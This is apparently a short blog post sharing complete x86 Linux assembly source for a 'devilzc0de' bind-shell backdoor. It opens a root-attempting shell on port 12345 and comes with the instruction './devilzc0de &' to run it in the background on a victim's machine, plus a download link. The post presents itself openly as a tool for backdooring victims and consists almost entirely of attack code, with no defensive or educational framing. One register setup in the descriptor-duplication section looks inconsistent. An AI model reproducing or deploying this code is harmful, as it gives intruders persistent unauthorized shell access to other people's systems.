download: http://yoyoparty....lzc0de.asm
Ok new tool made by devilzc0de.org for backdooring your victim @ port 12345
Source of devilzc0de.asm:
;devilzc0de port bind shell @ port 12345
;c0d3r: mywisdom
;special thanks: gunslinger,
;flyv666,kiddies,petimati,devil
;nongkong,whitehat,marco poppies,
;v3n0m,c0mrade, and all my friend
global _start
_start:
push byte 2
pop eax
int 80h
jmp soket
setresuid:
BITS 32
xor eax, eax ;reset eax
xor ebx, ebx
xor ecx, ecx
cdq
mov BYTE al, 0xa4
int 80h
setreuid:
mov ebx, eax
mov ecx, eax
push byte 70
pop eax
int 80h
soket:
push byte 0 ; simpan 0 ke stak
push byte 1 ; simpan 1 ke stak
push byte 2 ; simpan 2 ke stak
mov eax, 102 ;syscall nomor 102 register ax
mov ebx, 1
mov ecx, esp ; pointer ke stak
int 80h
mov edx, eax
binder:
;simpan semua argumen yang diperlukan ke stack
push byte 0
push byte 0
push byte 0
push word 0x3930
push word 2
mov ebx, esp
push byte 16
push ebx
push edx
mov eax,102 ;persiapan socket call
mov ebx,2
mov ecx,esp
int 80h
lisen:
push byte 0x1
push edx
mov eax,102
mov ebx,4
mov ecx,esp
int 80h
acep:
push byte 0
push byte 0
push edx
mov eax,102
mov ebx,5
mov ecx,esp
int 80h
mov edx, eax
siap_fd:
mov eax,63
mov ebx,edx
mov ebx,2
int 80h
mov eax,63
mov ebx,edx
mov ecx,1
int 80h
mov eax,63
mov ebx,edx
mov ecx,0
int 80h
eksekusi:
push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 80h
bersih2:
push byte 0x06
pop eax
int 80h
keluar:
push byte 0x01
pop eax
int 80h
Run in background @ your victim:
[code]
./devilzc0de &
0 comments:
Post a Comment
silahkan tinggalkan komentar anda disini .. :D